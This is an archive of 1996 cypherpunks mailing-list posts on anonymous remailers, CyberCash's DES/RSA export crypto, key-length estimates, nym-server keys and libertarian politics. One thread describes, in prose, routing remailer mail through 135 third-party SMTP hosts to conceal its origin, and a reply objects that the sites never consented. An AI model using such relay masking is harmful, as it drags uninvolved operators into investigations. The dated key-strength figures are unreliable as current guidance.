>operator isn't root, so I'm not bothering with trying to run one on someone
>else's system.) My debt/asset ratio is bad enough from all of this school
>that I don't have much for anyone to levy against. Ha, ha. Anyone want some
>rapidly obsolescing computer and law books? :(

	Why, precisely, do you think that remailers don't do much good where
the operator isn't root? The possibility of the sysop looking at the mail &
getting the private key, the increased susceptibility to cracking of non-root
accounts, possible sysop non-cooperation in an honest manner (as opposed to the
first one), or what?
	Thanks,
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 28 May 1996 08:23:10 +0800
To: cypherpunks@toad.com
Subject: Czarevna Tatjana Mixmaster Remailer
Message-ID: <01I57HVMTTUE8Y503M@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"nobody@replay.com" 26-MAY-1996 20:19:44.63

>Questions or comments should be directed to tatjana@mindport.net.

	Might I ask why you didn't mail from this address?
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 28 May 1996 08:56:25 +0800
To: markm@voicenet.com
Subject: Re: Quickremail v1.0b
Message-ID: <01I57ILMRZQ08Y503M@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"markm@voicenet.com"  "Mark M." 27-MAY-1996 12:57:44.84

>On Sun, 26 May 1996, Lance Cottrell wrote:

>> Which remailers does it install?

>Mixmaster, and it gives a choice of either installing the Freedom remailer or
>the remailer code written by Matt Ghio.  It also has support for reorder
>scripts, but I haven't debugged that part yet.

	What are the major differences between the various Mixmaster remailer
codes, especially in terms of the logistics of running a remailer? I'm
particularly interested in aspects related to A. running one by someone not
particularly familiar with UNIX (e.g., me) and B. a remailer accepting/sending
mail only from/to a limited list of addresses (e.g., only other remailers).
	Thanks,
	-Allen

P.S. I'm planning on starting up a remailer, probably on Lance's machine (to
take advantage of his expertise) sometime this summer. I do want to get PGP for
the VAX before then, and the MIT site doesn't appear to have this code.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 28 May 1996 09:10:50 +0800
To: pclow@pc.jaring.my
Subject: Re: CyberCash just did it!
Message-ID: <01I57IPALWC08Y503M@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"pclow@pc.jaring.my"  "peng-chiew low" 27-MAY-1996 13:41:16.44

>Out of curiousity I visited their site and I read the part of the security
>section which I've pasted below. Is it true? After all that I've read about
>the export issue and here Cybercash tells me they have got permission to
>export strong crypto? Please note that I am not someone who is familiar with
>the strength of crypto algo and any response to this post would be most
>helpful to a newbie in this business. Thanks.

	While I am also uncertain as to how strong the crypto they're using is,
I would guess that this passes under the banking exemption... I would
suspect that there is some lack of full anonymnity in the method, because
otherwise the US government wouldn't have given export permission even with
that exemption.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Tue, 28 May 1996 12:02:53 +0800
To: "E. ALLEN SMITH" <markm@voicenet.com
Subject: Re: Quickremail v1.0b
Message-ID: <adcff7c70b021004289b@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:28 PM 5/27/96, E. ALLEN SMITH wrote:
>From:   IN%"markm@voicenet.com"  "Mark M." 27-MAY-1996 12:57:44.84
>
>>On Sun, 26 May 1996, Lance Cottrell wrote:
>
>>> Which remailers does it install?
>
>>Mixmaster, and it gives a choice of either installing the Freedom remailer or
>>the remailer code written by Matt Ghio.  It also has support for reorder
>>scripts, but I haven't debugged that part yet.
>
>        What are the major differences between the various Mixmaster remailer
>codes, especially in terms of the logistics of running a remailer? I'm
>particularly interested in aspects related to A. running one by someone not
>particularly familiar with UNIX (e.g., me) and B. a remailer accepting/sending
>mail only from/to a limited list of addresses (e.g., only other remailers).
>        Thanks,
>        -Allen
>
>P.S. I'm planning on starting up a remailer, probably on Lance's machine (to
>take advantage of his expertise) sometime this summer. I do want to get PGP for
>the VAX before then, and the MIT site doesn't appear to have this code.


I thing you misunderstood his answer, it installs Mixmaster and also
installs either the Ghio or Freedom remailer. There are several flavors of
remailer. The most common (but not most popular) are Cypherpunk and
Mixmaster. At this time there is only one implementation of Mixmaster,
mine. There are several version of the Cypherpunk remailer (A.K.A. Type 1)
of which "Ghio" and "Freedom" are two. Mixmaster is known as a Type 2
remailer. Type 1 and type 2 are completely incompatible.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 28 May 1996 09:16:21 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 26 May 1996
Message-ID: <01I57IV7LQ068Y503M@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@educom.unc.edu" 27-MAY-1996 14:46:47.89
From: Edupage Editors <educom@educom.unc.edu>

>FLAT PC SCREENS HEAD FOR THE DESKTOP
>Liquid crystal display screens currently cost about five times that of a
>similarly-sized cathode ray tube screen, but that should be changing over
>the next couple of years, say LCD makers.  Next year, major LCD vendors
>expect to halve the difference, bringing prices down to two-and-a-half times
>that of CRTs.  Analysts say when the difference comes down to that point,
>the desktop replacement market could really take off.  "CRT replacement is
>inevitable, it's just that in the near term there are a lot of hurdles,"
>says an analyst at Stanford Resources.  "The place where it makes the most
>sense are with large-screen LCDs."  NEC recently unveiled a 20-inch
>high-resolution LCD screen with wide-angle viewing designed as a
>"CRT-killer" according to a NEC engineer.  (Investor's Business Daily 23 May
>96 A8)

	IIRC, LCD screens are considerably harder to read off of by Tempest
equipment than normal CRT screens. An encouraging change.

>NORTHERN TELECOM PHONES GET JAVATIZED
>Northern Telecom plans to incorporate Sun Microsystems' Java microprocessors
>and software in a new class of inexpensive "smart" telephones designed to
>double as Internet appliances.  The move makes Northern Telecom the first
>telephone manufacturer to license Java chips for its products.  The chips
>will be used in its wired PowerTouch phones and its wireless digital phones,
>and customer trials should start next year.  (Wall Street Journal 23 May 96
>B3)

	I would guess that these phones would still not be crypto-capable, but
I'm not quite sure what they have in mind to use Java in them for.
	-Allen

>***************************************************************
>Edupage ... is what you've just finished reading.  To subscribe to Edupage:
>send mail to: listproc@educom.unc.edu with the message:  subscribe edupage
>John McCain (if your name is John McCain;  otherwise, substitute your own
>name).  ...  To cancel, send a message to: listproc@educom.unc.edu with the
>message: unsubscribe edupage.   (If you have subscription problems, send
>mail to educom@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Chris Adams" <adamsc@io-online.com>
Date: Tue, 28 May 1996 11:59:10 +0800
To: "cypherpunks" <cypherpunks@toad.com>
Subject: Re: Philosophy of information ow
Message-ID: <199605280046.RAA28929@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


On 27 May 1996 11:25:28 pdt, m5@vail.tivoli.com wrote:

>What if I just *see* your couch, and then back in my garage I use my
>couch replicator to make a couch just like yours, complete with fuzzballs
>and loose change between the cushions?  Now I have your couch, in a sense.
>Are you still upset?
>
>When I walked off with your blood chemistry data, did you lose the use
>of it for your future purposes?

I believe that you are free to keep information, use it, etc. but
you MUST get permission before selling it.

/* From Chris Adams <adamsc@io-online.com> on a Warped PC running a proudly unregistered (for now) PMMAIL 1.5!
The Enigman Group - We do Web Pages! */

This Message Was Sent With An UNREGISTERED Version Of PMMail.  
Please Encourage Its Author To Register Their Copy Of PMMail.  
For More Information About PMMail And SouthSide Software's Other 
Products, Contact http://www.southsoft.com.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Tue, 28 May 1996 10:31:37 +0800
To: dcsb@ai.mit.edu
Subject: Re: CyberCash just did it!
Message-ID: <9605272240.AA13168@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 12:08 AM 5/28/96 +0700, peng-chiew low wrote:

According to below, it looks like the session  keys are single-DES, and they
are swapped using RSA... I'd think people would rather try cracking the DES
without bothering with the RSA -- be it 768 or 1024... (If the session key
is weak, it doesn't much matter what you send it in...)

>http://www.cybercash.com/cybercash/wp/bankwp.html#security
>
> " CyberCash transactions are protected by a powerful and sophisticated
>   system of encryption, combining DES private-key and RSA public-key 
>   encryption technologies. In fact, CyberCash's 768-bit RSA key encryption
>   capability is unique in that it is the most powerful encryption technology
>   currently licensed by the United States government for export. CyberCash 
>   also has been approved by the government for 1024-bit RSA key encryption,
>   and will be providing that technology by the end of 1996. "
_______________________
Regards,            When we ask advice, we are usually looking for 
                    an accomplice. -Marquis de la Grange
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Date: Tue, 28 May 1996 10:19:19 +0800
To: Wei Dai <weidai@eskimo.com>
Subject: Re: holographic remailing & key escrow
Message-ID: <9605272240.AA13172@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 03:20 PM 5/26/96 -0700, Wei Dai wrote:

>This software already exists.  Take a look at Disperse/Collect at
>http://www.eskimo.com/~weidai.  Disperse splits a file into n base64
>encoded pieces where any k of them can be used to reconstruct the
>original.  Collect will search through arbitrary collection of files (for
>example the entire news spool) for these pieces and automatically
>reconstruct everything that it finds. 

        Could something akin to this be a practicle method or test for
Blaze's "Key Escrow without Escrow Agents"? The main thing lacking is a
secure method to get it out to the different escrow servers... (One could
just encrypt each chunk of the message/key in a server's public key...
Servers would read that newsgroup and pull down and escrow the chunks that
they recognize.)
_______________________
Regards,            When we ask advice, we are usually looking for 
                    an accomplice. -Marquis de la Grange
Joseph  Reagle      http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu      E0 D5 B2 05 B6 12 DA 65  BE 4D E3 C1 6A 66 25 4E





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Tue, 28 May 1996 11:51:30 +0800
To: Mixmaster Mailing List <alt.privacy.anon-server@myriad.alias.net
Subject: Public Key for Nymrod
Message-ID: <Pine.NEB.3.93.960527190837.26869A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	I forgot to publish the public key for nymrod@nym.jpunix.com the
other day when I announced the re-birth of the Nymrod nym server. Here it
is:

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAzGm8g4AAAEEALaIAOXXnpui2Tlf7801sYp968SviYV45qrVpn9dbCxYRlUO
1g/NFHjUDO09NVn3GoWHRKfD81U6mNf+2lSkCDRaiYWysJpjSIspRIX5uZ44vmBx
ZcBQzO35jxamJCoxHmVYkDF7IdWutIlmAzjLMdkS3lKJUaEwDqJo4m8yfNopAAUR
tDNUaGUgTnltcm9kIFBzZXVkb255bSBTZXJ2ZXIgPG55bXJvZEBueW0uanB1bml4
LmNvbT6JAJUDBRAxpwtzU5OkROGu2G8BAcycA/9rKX7giTJ0FCaBb0ihJxZsGgth
FdjmNt6dVh0AJ26CK5EiqehMHXhINcugWmRQY5OcIfhIUI8/ZW/EJpiaky+NWY5b
nHmcXlJj07tmAiAa6B8gs8aWH5XyJ9AlEXC5OdhfpTZKFL9fHNceZtJYwABZeD11
KDVrZqCW6lNcw7IqL7QyVGhlIE55bXJvZCBQc2V1ZG9ueW0gU2VydmVyIDxhbGlh
c0BueW0uanB1bml4LmNvbT6JAJUDBRAxpwvUU5OkROGu2G8BAZCsA/9sQP71f5YC
4DonpGwKw8vcz4IQ/P8jZEFpbzkJoBIg+PTrTqQZxmzr0Gg4bZn3f+0BIsuqId/U
H71thZH7MvxHBQqU+E4oCzy44cmujMQv+BnT44F91ztutPTyyf2KlXEFBBX6ofbf
ffJsmWIVkjWMcdnZndHMHuo/8/FxByC+hw==
=pbAO
- -----END PGP PUBLIC KEY BLOCK-----

	I apologize for any inconvenience.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMapEqFOTpEThrthvAQG1awP+N3N6aQc5M8TofwJLPJ8gzKl6y6B6Y/iS
6l+nq0nCE369eWTC2Fgp30ihlLY9FOcg+M1QtVv/SQiozd+vrDaPTXtIQh8OPmw6
RZemfAkNgetIimpA1gNyN8/gLXGhKBnkaFawuNw4FESEyjbQ/IZmV02W4qO4MC9J
axN6nfcTFa8=
=5g4m
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 28 May 1996 11:31:27 +0800
To: Frank Stuart <fstuart@vetmed.auburn.edu>
Subject: Re: Sun pushing SKIP for intranets and java
In-Reply-To: <199605270739.CAA11092@snoopy.vetmed.auburn.edu>
Message-ID: <199605272346.TAA08318@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Frank Stuart writes:
> Sun is pushing SKIP for intranets and encrypting/verifying java applets.

If thats true, its a remarkably bad idea. The IP security layer isn't
anywhere near the layer where you should be doing things like signing
Java applets.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 28 May 1996 12:12:46 +0800
To: cypherpunks@toad.com
Subject: Programmable field gate array chips down in price
Message-ID: <01I57OPPFA748Y506V@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	What were the estimates people were giving for the cost of an array
to crack current credit card over the Net encryption?
	-Allen


>       XILINX SLASHES PRICES OF FIELD GATE ARRAY CHIPS, UPS PERFORMANCE
>   __________________________________________________________________________
                                       
>      Copyright &copy 1996 Nando.net
>      Copyright &copy 1996 Bloomberg  
   
>   SAN JOSE, Calif. (May 27, 1996 12:53 p.m. EDT) -- Xilinx Inc. said it
>   will slash the price of some of its programmable microchips by as much
>   as 53 percent over the next 12 months.
   
>   Xilinx said a new manufacturing process also will allow it to increase
>   performance of the chips, known as field programmable gate arrays,
>   which are found in a variety of complex electronic devices.
   
>   Xilinx said that by the end of the year, it expects to be selling its
>   XC5202 field programmable gate arrays for $5 apiece, down 44 percent
>   from an earlier projected price of $9. That price should decline to
>   $4.50 by mid-1997, Xilinx said.
   
>   The San Jose, California-based semiconductor maker said it also will
>   trim prices of more expensive gate arrays by as much as 53 percent,
>   bringing XC5210, for example, to $18 in mid-1997 from a current price
>   of $38.
   
>   The price cuts are for customers who purchase thousands of gate arrays
>   at a time.

[...]
   
>   Xilinx pioneered the development of programmable chips, which are
>   found in complex devices such as networking and telecommunications
>   equipment utilizing Asynchronous Transfer Mode (ATM) technology. Its
>   revenue increased 58 percent to $560.8 million in the fiscal year
>   ended March 31, in the face of steadily falling chip prices, as the
>   company's products found uses in a growing number of devices.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Tue, 28 May 1996 14:21:22 +0800
To: Ben Holiday <ncognito@gate.net>
Subject: Re: Asendmail For Mix [Testers Needed]
In-Reply-To: <Pine.A32.3.93.960527204713.60624A-100000@hopi.gate.net>
Message-ID: <Pine.NEB.3.93.960527202333.27433A-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 27 May 1996, Ben Holiday wrote:

> For the past several days i've been working on a method of concealing the
> identity of Remailers..
> 
> I've put together a program that acts as a replacement for sendmail with
> mixmaster, along with a list of 135 sites on the internet that either do
> not add received headers at all, or add headers that don't indicate who
> the originator was.

	Do these sites know that you are using them to mask a remailer? I
would think it would be very bad netiquette to cause a system to be
investigated by some official authority because your remailer was using
them as a front without their express knowledge and permission.

	I would think that obtaining permission would be the least you
could do, but that would also defeat the anomitity by the nature of
notifying the site that you wish to use them. This does not apply to
chaining remailers as by running a remailer, the operator of the remailer
is tacitly giving permission to be used in the chain in most cases.

 John Perry - KG5RG - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMapW01OTpEThrthvAQENiwP+LIrhnIK02gV28W/0GhBr1QvYjSvL6N8V
XE9s85AkQEtfjYMI78PkGAEH0Wj8ZcOGsdz0ZySGD/BxGXHjvOCbW3ObUoytASx6
phllJ+cb1e4bGZu0WOcpnRUjz9M/yVB9uO/6K4zYqipVv18Cdt33yOb0joBimVMa
XUAFfwJtpGM=
=m9Ar
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 28 May 1996 16:18:08 +0800
To: cypherpunks@toad.com
Subject: Re: none [mail2news broke]
In-Reply-To: <199605272325.BAA23173@basement.replay.com>
Message-ID: <Pine.GUL.3.93.960527202606.14736C-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Usura just answered this on alt.privacy.anon-server. The basement
mail2news gateway is temporarily blocking posts from c2.org until the
alt.syntax.tactical forgers go away or can be filtered with new code.

While I publicly whined that SOMETHING needed to be done about the problem
(for PR reasons if nothing else), I'm disappointed that there was no
public announcement of the downtime first. Heck, when Scientology came
knocking, there was an 11-day window before utopia shut down... 

Of course, there's probably more to this than we mere mortals know, so
don't take this as any kind of judgement. (I'm answering mainly to cover
my ass that it ain't totally my fault.)

-rich

On Tue, 28 May 1996, Anonymous wrote:

> My 'nym which has worked just fine has suddenly stopped working this
> weekend.  My reply block has not changed, and the only remailer in
> it is remail@c2.org.
> 
> I have the reply block set up to send the encrypted reply to
> remail@c2.org where Newsgroups:  and Subject:  headers are pasted on
> with the "##" operator.  The message is then sent on to the replay
> mail2news gateway for posting to alt.anonymous.messages.
> 
> What's happened?  Anyone know?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Tue, 28 May 1996 13:50:10 +0800
To: cypherpunks@toad.com
Subject: Re: Layman's explanation for limits on escrowed encryption ...
In-Reply-To: <01I53K6SDN348Y4Z90@mbcl.rutgers.edu>
Message-ID: <Pine.LNX.3.93.960527203358.1163A-100000@gak>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3941.1071713581.multipart/signed"

--Boundary..3941.1071713581.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

On Fri, 24 May 1996, E. ALLEN SMITH wrote:

> 	Hmm.... what were the normal key-length recommendations again? This
> appears to imply that the NSA can break at least 64-bit, and probably 80-bit,
> encryption. How does this translate into public key lengths? E.g., how many
> normal bits is a 1024-bit PGP key equivalent to?
> 	-Allen

The normal key-length recommendation was 96 bits.  64 bits and 80 bits are
equivalent to 512 bits and 768 bits respectively.  I would guess that a
1024-bit key is about as strong as an 96-bit key.  The first two numbers are
from _Applied Cryptography_; my estimate is an extrapolation from the data in
AC.

-- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me



--Boundary..3941.1071713581.multipart/signed
Content-Type: application/octet-stream; name="pgp00005.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00005.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgTUVTU0FHRS0tLS0tClZlcnNpb246IDIuNi4zCgpp
UUNWQXdVQk1hcEwrTFpjK3N2NXNpdWxBUUdicHdRQW9QN1gwR0N2WmVHMUY1
MHV2NHhRa0dYYjBTSC9nRDZQCkxIUVBiK0RmZGF6RHNIaTdSdTdtYllSM3lV
Tytocm5SOHRqUWlBb01OLzhFZnUwSVNzSWNhR1Jla0Q0QnAwNHUKSkVQRlpv
Nkx6blV5RmoyM1hsSjdWaENqUW5STmxDYUFzbE1GSHg1RWVJL0dXZXZZQUJm
NHpEaHdDSmVONExwNQp2VDZMOU4yMTRHMD0KPXprUzgKLS0tLS1FTkQgUEdQ
IE1FU1NBR0UtLS0tLQo=
--Boundary..3941.1071713581.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Tue, 28 May 1996 12:02:51 +0800
To: grafolog@netcom.com
Subject: Re: Edited Edupage, 26 May 1996
Message-ID: <01I57PI2X82O8Y506V@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"grafolog@netcom.com"  "jonathon" 27-MAY-1996 20:45:08.30

>	Porting PGPhone to JAVA, perhaps?

	The difficulty is that I don't know if the Java in the phones can
actually affect the phone transactions in voice, or just do modem connections
using the phones, or just act to handle the phone numbers.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Tue, 28 May 1996 13:14:11 +0800
To: Subir Grewal <grewals@acf2.nyu.edu>
Subject: Throwing away the whole bushell because one apple is rotten...
Message-ID: <9605280104.AB17333@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 27 May 96 at 12:07, Subir Grewal wrote:

> You might want to read up on what
> classical liberalism is andd what a minimalist state implies before
> you spout Rand.

The fact that I quote Rand occasionnally does not mean that I endorse 
everything she said.  The word "spout" seems to be derogatory here 
and I see nothing that guarantee it.

Some of her ideas did not pass the test of reality, and some other 
did.  But the fact that some did not does not invalidate the other 
that did.

:)

JFA

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 I reserve the right to post publicly any private e-mail sent to me.
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Tue, 28 May 1996 13:47:53 +0800
To: remailer-operators@c2.org
Subject: Asendmail For Mix [Testers Needed]
Message-ID: <Pine.A32.3.93.960527204713.60624A-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


For the past several days i've been working on a method of concealing the
identity of Remailers..

I've put together a program that acts as a replacement for sendmail with
mixmaster, along with a list of 135 sites on the internet that either do
not add received headers at all, or add headers that don't indicate who
the originator was.

The program is called asendmail and what it does is pick 2 servers from
its list of proxy's (using a modified version of the rnd generator from
Lance Cottrell's reorder package). It then opens an smtp socket with the
first server, sends the second servers name in its introduction, and
procedes to send its mail that way.

I'm not an expert on such things, but a careful look at the resulting mail
has revealed no sign of the originating remailers address. As far as I can
tell the only way to identify the remailer would be by obtaining logs from
the proxy host, if they exist.

Asendmail is being used for all mixmaster mail sent through
ncognito@cyberpass.net currently.  It would be helpful in debugging if
some people could route a few test messages through the mailer, examine
the headers, verify that mail has arrived, etc. Any and all feedback will
be greatly appreciated.

Assuming that the results of this testing are acceptable, i will make a
beta version of asendmail, and my (ever expanding) proxy list available.

Thanks, 




 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Subir Grewal <grewals@acf2.NYU.EDU>
Date: Tue, 28 May 1996 14:33:28 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <9605270445.AB06762@cti02.citenet.net>
Message-ID: <Pine.ULT.3.92.960527212530.289B-100000@acf2.NYU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Mon, 27 May 1996, Jean-Francois Avon wrote:

[NOTE: I'm going to be going away later this week and network connectivity
will probably be intermittent for a month.  I'll have to unsubscribe to
Cypherpunks sometime soon.  Which is why I suggested we continue this
another time.]

:> Of course there are those who
:> fervently believe in the socialist ideal
:
:But, my dear, even in the most libertarian or AP-ruled world, they
:would absolutely free to give away *all* of their salary for the
:causes they consider valid.  Only, thoses who don't agree with them
:would not be coerced into thoses noble causes.

Socialists aren't really interested in "giving away money" to a particular
cause.  To put it in crude terms, they're interested in taking your money
(and that of others) to create a socialist (read collectivist) society.
To believe that socialists will be content in a liberal world because
philanthropy is not illegal is to misunderstand socialism completely.

:This paragraph seems to indicate that the only difference between
:libertarians and socialist is a mere difference of opinion and that
:everybody is justified to act on their beliefs.  But the socialists
:who pretend that are simply blanking out the fact that *they too*
:recognize that Reality Is since they want to use force to get a
:lunch out of the mouth of somebody who have one (and who happened to
:produce it himself) to put it in the mouth of another who didn't
:have.  Therefore, it is OK to deny reality when somebody come up
:with arguements against socialism, but it is darn convenient to use
:it (in the form of a loaded gun...)

Nope, the socialists don't believe they're taking "lunch out of someone's
mouth".  They believe they are creating a communitarian society where
there is no decadence, and each of us gets an approximately equal amount.
"progressive" taxation exists because socialists believe those who have
more (have taken more from society, benefited more from the infrastructure
of the state etc.) should put more into the communitarian pot.  That this
does not work in a society with any degree of freedom (and esp. a
democracy) is difficult to get through to socialists.  Most of them
believe that democracy, freedom and a socilist structure (read public
ownership of the means of production) are compatible with each other.
- From all evidence, they are sadly mistaken.

:Oh, you mean, "for them, anybody who pass a judgment of his own that
:contradict them should be killed"  I see...

Glad you noticed that.  Now tell me how AP for any other cause is
different?

:> Marx was not the first to poitn
:> out that institutions influence our actions, that we are products of
:> our times, that the choices we face are as much determined by our
:> own preferences as they are by the world around us.
:
:Well, of course, our perception of reality is context dependent.  But
:you seems to attempt to hint that truth is relative because knowledge
:is contextual.  It looks like an attempt on reason.

The statement I made has absolutely jack-shit to do with "truth".  It's
simply a comment on the insidious nature of institutions and how it may be
easy to ignore the variety of effects they may have.

:I think that by the nature of AP, this would be ruled out.  Maybe
:there would be a fanatic president, but he would preside nothing
:because nobody would be there to enforce his fanatic views.

That depends.  If enough people believe the AP tactics are threatening
they may support a rigid state that cracks down on AP groups in a
totalitarian fashion.  It may be possible to prevent this, but the only
way I can see it happening is if there is a greater level of
class-consciousness promoting a view of politicos and bureaucrats as
"them".  Till kids dream of becoming president I doubt it's about to
happen.

On income taxes, one of the most fundamental oppositions to income taxes
when they were first introduced was on privacy grounds.  It seemed to be a
gross invasion of privacy to have someone else know exactly how much you
were earning and from where.  I wish more people today looked at it in the
same manner.  Other objections include interference with the pricing
mechanism and incentives.

hostmaster@trill-home.com * Symbiant test coaching * Blue-Ribbon * Lynx 2.5
A fool must now and then be right by chance.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Key Escrow = Conscription for the masses | 2048 bit via finger

iQB1AwUBMapbBRwDKqi8Iu65AQG6CwL/QfpVjlNq5rmo/L0Biv7iqrUtz5zHiPEe
Sje788mJDM1yj/Ri7QNMOIBuSZ7AToub3mpSI3udW23L80u7W8nwl+/gERJKk+uL
jpSdGjNGCjfIurxMPr3LxnBDDi/BQz6B
=CNuE
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Tue, 28 May 1996 15:45:16 +0800
To: John Young <jya@pipeline.com>
Subject: Re: SEM_tex
In-Reply-To: <199605280113.BAA26887@pipe2.t1.usa.pipeline.com>
Message-ID: <Pine.GUL.3.93.960527214652.14736F-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 May 1996, John Young wrote:

>       In contrast, forensic experts frequently say that the 
>       Forensic Science Agency in Northern Ireland has the most 
>       thorough precautions against contamination. The agency 
>       moved to a new laboratory in 1992 after the IRA blew up 
>       its old one. 

I suppose that's one way to deal with a housekeeping problem...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Holiday <ncognito@gate.net>
Date: Tue, 28 May 1996 13:11:46 +0800
To: "John A. Perry" <perry@alpha.jpunix.com>
Subject: Re: Asendmail For Mix [Testers Needed]
In-Reply-To: <Pine.NEB.3.93.960527202333.27433A-100000@alpha.jpunix.com>
Message-ID: <Pine.A32.3.93.960527213325.55980A-100000@hopi.gate.net>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 27 May 1996, John A. Perry wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Mon, 27 May 1996, Ben Holiday wrote:
> 
> > I've put together a program that acts as a replacement for sendmail with
> > mixmaster, along with a list of 135 sites on the internet that either do
> > not add received headers at all, or add headers that don't indicate who
> > the originator was.
> 
> 	Do these sites know that you are using them to mask a remailer? I
> would think it would be very bad netiquette to cause a system to be
